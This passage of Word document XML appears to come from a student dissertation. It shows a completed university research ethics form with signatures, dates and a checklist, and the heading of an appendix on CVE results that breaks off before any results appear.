            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01E8A9B8" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Signature of applicant:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55C3B1B0" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Helen Frey</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2139" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F848F78" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>Date: 19/6/22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0936BDBD" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1419A972" w14:textId="6D1A876B" w:rsidR="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>For STUDENT Submissions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCA12F3" w14:textId="77777777" w:rsidR="00CA0B92" w:rsidRPr="00E42F41" w:rsidRDefault="00CA0B92" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5817"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5"/>
        <w:gridCol w:w="4559"/>
        <w:gridCol w:w="2664"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="50F0021F" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="346"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="37862D37" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="318176AA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Director of Studies/Supervisor:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EB22FDF" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Carlene Campbell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="pct"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="24E36F3B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Date:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="442EEF84" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="57A786EC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>21/06/2022</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="1508DE74" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="347"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="228E38CE" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1242" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4525ECA2" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
              <w:t>Signature:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2173" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5AF3ECB9" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C604954" wp14:editId="44E9FCEC">
                  <wp:extent cx="1314450" cy="342900"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="760259180" name="Picture 760259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59"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1314450" cy="342900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACD684C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1270" w:type="pct"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15270574" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="104ABB2C" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DFB2ED9" w14:textId="6629B795" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28EA6AE7" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E42F41">
        <w:t>Checklist: Please complete the checklist below to ensure that you have completed the form according to the guidelines and attached any required documentation:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid1"/>
        <w:tblW w:w="10485" w:type="dxa"/>
        <w:tblInd w:w="-289" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="675"/>
        <w:gridCol w:w="9810"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="0B5DD36D" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="491"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
              </w:rPr>
              <w:id w:val="1454446193"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="4413F0B1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:eastAsia="MS Gothic"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C0588CC" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
              </w:rPr>
              <w:t>I have read the guidance notes supplied before completing the form.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="5ACB05ED" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
              </w:rPr>
              <w:id w:val="-17703630"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2984C3DB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                  <w:rPr>
                    <w:rFonts w:eastAsia="MS Gothic"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:eastAsia="MS Gothic" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="655A786E" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I have completed ALL RELEVANT sections of the form in full.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="67DFE9E5" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="419"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1393921880"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="39AF3981"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9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="123DCCA1" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I confirm that the research activity has received approval in principle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="22758301" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="492"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-1978295672"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="141CD2E1"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9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30D2CFAA" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I have attached a copy of final/interim approval from external organisation (where appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="516C5ADB" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="720"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1893926499"/>
              <w14:checkbox>
                <w14:checked w14:val="0"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="112F7377"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9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="646D5540" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t xml:space="preserve">I have attached a full risk assessment (and have NOT completed Section H of this form) (where appropriate) </w:t>
            </w:r>
            <w:r w:rsidRPr="00E42F41">
              <w:rPr>
                <w:i/>
              </w:rPr>
              <w:t>ONLY TICK IF YOU HAVE ATTACHED A FULL RISK ASSESSMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="4C4275C6" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="858"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1189257540"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="44E65EE5"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9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="54D36124" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I understand that it is my responsibility to ensure that the above-named research activity will meet the University’s Research Ethics and Integrity Code of Practice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="5C888E90" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="969"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1030683582"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="2CAD02A6" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="044B6C5B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I understand that before commencing data collection all documents aimed at respondents (including information sheets, consent forms, questionnaires, interview schedules etc.) must be confirmed by the DoS/Supervisor, module tutor or Academic Director.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E42F41" w:rsidRPr="00E42F41" w14:paraId="2D1C7911" w14:textId="77777777" w:rsidTr="00CA0B92">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="675" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="-174501529"/>
              <w14:checkbox>
                <w14:checked w14:val="1"/>
                <w14:checkedState w14:val="2612" w14:font="MS Gothic"/>
                <w14:uncheckedState w14:val="2610" w14:font="MS Gothic"/>
              </w14:checkbox>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="7DD20A4B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
                <w:pPr>
                  <w:spacing w:line="240" w:lineRule="auto"/>
                </w:pPr>
                <w:r w:rsidRPr="00E42F41">
                  <w:rPr>
                    <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                  </w:rPr>
                  <w:t>☒</w:t>
                </w:r>
              </w:p>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="7DE1D33B" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="MS Gothic"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9810" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B718587" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00E42F41">
              <w:t>I have deleted the guidance notes before submitting the PG2 for consideration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="385D3FAB" w14:textId="77777777" w:rsidR="00E42F41" w:rsidRPr="00E42F41" w:rsidRDefault="00E42F41" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11B0FB64" w14:textId="7184DCBD" w:rsidR="002F7CF9" w:rsidRDefault="002F7CF9" w:rsidP="00663E33">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1F3864" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1326BC6A" w14:textId="77777777" w:rsidR="00401D23" w:rsidRDefault="00401D23" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:sectPr w:rsidR="00401D23">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B76DF0D" w14:textId="77777777" w:rsidR="00E74CD6" w:rsidRDefault="002F7CF9" w:rsidP="00401D23">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="1287"/>
      </w:pPr>
      <w:bookmarkStart w:id="528" w:name="_Toc113190768"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">CHAPTER 10: APPENDIX 4 - </w:t>
      </w:r>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="001F52C3">
        <w:t>CVE RESULTS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
      <w:r w:rsidR="00DF42B8" w:rsidRPr="001F52C3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8D90F3" w14:textId="44364433" w:rsidR="00DF42B8" w:rsidRDefault="00E74CD6" w:rsidP="00401D23">
      <w:pPr>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Results of CVE’s that have a rating of over 4. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FE910C" w14:textId="076588A9" w:rsidR="00DF42B8" w:rsidRDefault="002627FD" w:rsidP="00401D23">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:hanging="567"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
